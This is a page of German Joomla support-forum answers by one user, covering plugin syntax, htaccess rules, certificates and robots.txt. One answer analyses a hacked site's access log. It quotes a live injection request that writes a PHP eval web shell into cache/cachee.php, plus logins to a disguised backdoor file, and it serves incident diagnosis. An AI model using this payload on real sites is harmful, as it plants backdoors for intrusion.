Du verwendest Spitzklammern, das Youtube-Tag muss jedoch in geschwungenen Klammern { } (Alt Gr + 7 und 0) stehen.
Beiträge von flow
-
-
Auch wenn das Thema vom TE für gelöst erklärt wurde: SobiPro könnte die Anforderungen, auch in der kostenlosen Version, problemlos und imho leichter als Seblod lösen.
Eigene Felder können erstellt, und, falls gewünscht, mit vorher festgelegten Werten belegt werden, nach denen dann in der Suche gefiltert werden kann. Beiträge können von allen Nutzern erstellt, mit Bildern versehen, und dann von einem Admin abgesegnet werden.
-
Ich habe bereits die Erweiterung "AllVideos" installiert, habe aber Probleme damit, da ich kein FTP nutze.
Was für Probleme meinst du?
Eigentlich ist »AllVideos« sehr einfach zu bedienen: 1. Installieren, 2. Aktivieren (und Parameter einstellen), 3. Tag an gewünschter Stelle einfügen, z.B.: {youtube}Wfint096C2w{/youtube}.
-
ich habe es mal so versucht:
RewriteCond %{THE_REQUEST} ^.*/index\.php
RewriteRule ^(.*)index.php$ /$1 [R=301,L]Diese Regel, die dafür sorgt, dass index.php aus dem URL verschwindet, wird in der Joomla-Standard-Htaccess mitgeliefert (in der Joomla! core SEF Section deiner htaccess). Ich würde vorschlagen, dass du deinen Versuch löscht oder auskommentierst, und dann schaust, ob die mitgelieferte Regel das gewünschte Ergebnis bringt.
-
62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Lädt via Datei »cachee.php« weitere Dateien nach, in diesem Fall vermutlich u.a. eine Benutzerverwaltung, die über die neu hinzugefügte, getarnte Datei »mod_articles_tags.php« läuft.
35.166.247.183 - - [03/Jan/2017:18:53:42 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 1572 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Versuch, eine Schwachstelle in einem anderen CMS auszunutzen.
107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)"
192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"Anmeldungen in der »neuen« Benutzerverwaltung.
Der
Hack ist ganz schön im web.log zu sehen:Das ist nur ein Teil. Offensichtlich werden jetzt weitere Dateien per »cachee.php« nachgeladen, und, wie von @flotte bereits angemerkt, automatisiert weitere Schwachstellen gesucht. Die Frage ist aber, wie und wann die Datei »cachee.php« in deinen Webspace gekommen ist.
-
Ja, das mit der Verschlüsselung ist auch komisch... Ich nutze Let's Encrypt und die Seite hat ansonsten keine Probleme. Nur iwie Google aktuell (gestern war die adresse noch sicher...)
Dein Zertifikat ist gültig für »repronik.de«, ohne »www«, während die Passwortzurücksetzen-Seite über »www.repronik.de« ausgeliefert wird.
@flow
Ich habe dazu eine Anleitung gelesen, das "Disallow: /components/" sollte es doch tun..., oder nicht?Du hast ein »S« zuviel: der Pfad »components« ist nicht erlaubt, »component«, wie im URL der Resetseite, aber schon.
-
Du hast in der robots.txt den Pfad »/components/« ausgeschlossen. Davon abgesehen dauert es einige Zeit, bis sich Änderungen bei Google bemerkbar machen.
-
Was spricht dagegen, die normalen Joomla-Beiträge als Lexikon zu nutzen?